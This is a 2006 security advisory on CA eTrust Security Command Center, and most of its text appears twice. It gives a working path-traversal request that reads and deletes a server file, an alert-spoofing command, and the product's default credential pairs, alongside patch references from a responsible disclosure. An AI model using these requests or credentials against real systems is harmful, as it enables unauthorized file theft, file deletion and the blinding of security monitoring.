Computer Associates eTrust Security Command Center - Multiple Vulnerabilities
Release Date:
22-Sep-2006
Software:
Computer Associates - eTrust Security Command Center
http://www3.ca.com/solutions/Product.aspx?ID=4351
"eTrust Security Command Center helps you discover and prioritize
relevant security data to effectively manage your security risks in real
time. By correlating security risks to assets, you can take corrective
action and investigate security incidents through a centralized command
and control center."
Versions affected:
eTrust Security Command Center 1.0, r8, r8 SP1 CR1 and r8 SP1 CR2.
eTrust Audit 1.5 and r8.
Vulnerabilities discovered:
1) Reveal web server path.
2) Read and delete arbitrary files from the host server under
the service account, generally LocalSystem.
3) The event alerting does not use authentication, and as such is
vulnerable to external replay attacks, similar to IDS replay attacks.
Vulnerability impact:
Medium - A malicious authenticated user may read and delete arbitrary
files, whilst an unauthenticated attacker may use a replay
attack to distract staff from tracking real events, and/or
denial of service by consuming disk space with false alerts.
Vulnerability information
The software is operated by use of a web browser. Authenticated users have
access to the various security reports and functions, which generally do
not verify user controlled parameters.
1) The 'ePPIServlet' script returns a detailed path error when sent the
quote character [ ' ] as part of the 'PIProfile' function.
2) The 'eSMPAuditServlet' class contains a function, 'getadhochtml',
which is used to provide reporting functionality. The component generates
reports in a temporary file location, returns the file contents to the
web client, then deletes it... but does not validate the path.
3) There is an API function to create your own alerts: eTSAPISend.exe.
The service does not use any authentication, so the attacker may script
the binary to send thousands of false-positive alerts to the Security
Command Center, diverting attention and resources from real threats.
Examples (lines have been wrapped):
1) https://escc-server.example.com:8080/etrust/servlet/ePPIServlet?
PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile=
Threat+Management&node=
Would return an error similar to: "Cannot read profile:
C:\Program Files\Computer Associates\eTrust\Command Centre\servlet\.. "
2) https://escc-server.example.com:8080/etrust/servlet/eSMPAuditServlet?
verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini
Assuming the product was installed on the C drive, this will return the
contents of c:\boot.ini to the client, then immediately delete it, e.g:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows 2003 Server"
3) An example Windows Logon failure event would be similar to:
C:\> etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon
-sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70
-src Security -nid 529 -inf "Logon Failure"
Exploitation Requirement:
Fortunately, the web service requires product based authentication prior
to execution for 1 and 2. Unfortunately, the product ships with multiple
default usernames and passwords, which although unlikely, may still be
present. The default username:password pairs are below:
eadmin:eadmin
iam:iam
threat:threat
admin:admin
For point 3, the $dstIP must have the Audit Router socket open (tcp/111).
Solution:
1) Fixes QO81875, QO81758, QO81862, QO81863 ...
2) Fixes QO81851, QO81876, QO81878 can be found at:
http://supportconnectw.ca.com/public/eTrust/eTrust_scc/downloads/eTrusts
cc_updates.asp
3) No solution - use perimeter based firewalls.
References:
aushack.com advisory
http://www.aushack.com/advisories/200608-computerassociates.txt
Credit:
Patrick Webster ( patrick (at) aushack (dot) com [email concealed] )
Thanks to the CA Security team for their quick response.
Disclosure timeline:
21-Jan-2006 - Vulnerabilities discovered.
04-Aug-2006 - Sent to Computer Associates Security Advisor.
04-Aug-2006 - Vendor response & verification.
19-Sep-2006 - Vendor patch release.
22-Sep-2006 - Public disclosure.
22-Sep-2006
Software:
Computer Associates - eTrust Security Command Center
http://www3.ca.com/solutions/Product.aspx?ID=4351
"eTrust Security Command Center helps you discover and prioritize
relevant security data to effectively manage your security risks in real
time. By correlating security risks to assets, you can take corrective
action and investigate security incidents through a centralized command
and control center."
Versions affected:
eTrust Security Command Center 1.0, r8, r8 SP1 CR1 and r8 SP1 CR2.
eTrust Audit 1.5 and r8.
Vulnerabilities discovered:
1) Reveal web server path.
2) Read and delete arbitrary files from the host server under
the service account, generally LocalSystem.
3) The event alerting does not use authentication, and as such is
vulnerable to external replay attacks, similar to IDS replay attacks.
Vulnerability impact:
Medium - A malicious authenticated user may read and delete arbitrary
files, whilst an unauthenticated attacker may use a replay
attack to distract staff from tracking real events, and/or
denial of service by consuming disk space with false alerts.
Vulnerability information
The software is operated by use of a web browser. Authenticated users have
access to the various security reports and functions, which generally do
not verify user controlled parameters.
1) The 'ePPIServlet' script returns a detailed path error when sent the
quote character [ ' ] as part of the 'PIProfile' function.
2) The 'eSMPAuditServlet' class contains a function, 'getadhochtml',
which is used to provide reporting functionality. The component generates
reports in a temporary file location, returns the file contents to the
web client, then deletes it... but does not validate the path.
3) There is an API function to create your own alerts: eTSAPISend.exe.
The service does not use any authentication, so the attacker may script
the binary to send thousands of false-positive alerts to the Security
Command Center, diverting attention and resources from real threats.
Examples (lines have been wrapped):
1) https://escc-server.example.com:8080/etrust/servlet/ePPIServlet?
PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile=
Threat+Management&node=
Would return an error similar to: "Cannot read profile:
C:\Program Files\Computer Associates\eTrust\Command Centre\servlet\.. "
2) https://escc-server.example.com:8080/etrust/servlet/eSMPAuditServlet?
verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini
Assuming the product was installed on the C drive, this will return the
contents of c:\boot.ini to the client, then immediately delete it, e.g:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows 2003 Server"
3) An example Windows Logon failure event would be similar to:
C:\> etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon
-sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70
-src Security -nid 529 -inf "Logon Failure"
Exploitation Requirement:
Fortunately, the web service requires product based authentication prior
to execution for 1 and 2. Unfortunately, the product ships with multiple
default usernames and passwords, which although unlikely, may still be
present. The default username:password pairs are below:
eadmin:eadmin
iam:iam
threat:threat
admin:admin
For point 3, the $dstIP must have the Audit Router socket open (tcp/111).
Solution:
1) Fixes QO81875, QO81758, QO81862, QO81863 ...
2) Fixes QO81851, QO81876, QO81878 can be found at:
http://supportconnectw.ca.com/public/eTrust/eTrust_scc/downloads/eTrusts
cc_updates.asp
3) No solution - use perimeter based firewalls.
References:
aushack.com advisory
http://www.aushack.com/advisories/200608-computerassociates.txt
Credit:
Patrick Webster ( patrick (at) aushack (dot) com [email concealed] )
Thanks to the CA Security team for their quick response.
Disclosure timeline:
21-Jan-2006 - Vulnerabilities discovered.
04-Aug-2006 - Sent to Computer Associates Security Advisor.
04-Aug-2006 - Vendor response & verification.
19-Sep-2006 - Vendor patch release.
22-Sep-2006 - Public disclosure.